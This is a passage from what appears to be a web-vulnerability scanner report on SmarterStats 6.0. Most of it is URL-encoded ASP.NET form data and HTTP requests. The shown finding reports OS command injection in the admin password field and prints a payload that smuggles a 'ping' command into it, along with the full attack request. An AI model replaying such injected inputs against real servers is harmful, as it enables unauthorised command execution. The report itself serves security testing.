mV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BTZW9PcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAANU2VvT3B0aW9uc1RhYgtkBRJjdGwwMCROYXZQSCRwZ3JMb2cPBSJjdGwwMF9NUEhfZ3JkTG9nU3RhdHVzfDE2fDB8OXwyNXwwZAUZY3RsMDAkTVBIJFBhZ2VJZGVudGlmaWVyMQ8FIDY3MDZiNjFkOGZiODQwOGRiMGJkN2RhZjk5NTZlM2VjZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFhkFJGN0bDAwJE1QSCRjaGtTZW9FbmFibGVkX1NldHRpbmdDaGVjawUoY3RsMDAkTVBIJGNoa1N0cmlwQWZ0ZXJTZW1pX1NldHRpbmdDaGVjawVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQwBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQzBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDQFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNQVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ2BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDcFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ5BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEwBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDExBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEyBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDEzBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE0BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE1BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE2BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE3BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE4BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDE5BUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIwBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBUljdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIxBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMQ8y1gsAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRZjdGwwMCRNUEgkZ3JkU2VvU3RhdHVzDwU6VHJ1ZXxUcnVlfHxUcnVlfFRydWV8bGFzdFByb2Nlc3NpbmdEYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQFNFT1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADFNFT1N0YXR1c1RhYgtkOM5P3EdqRgSfYoIjJCDTiv3sZp5ktoudiy8rNReMpN8%3D&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:51:26 GMT
Content-Length: 0


1.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtAdminNewPassword_SettingText parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtAdminNewPassword_SettingText parameter appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24txtAdminNewPassword_SettingText parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYg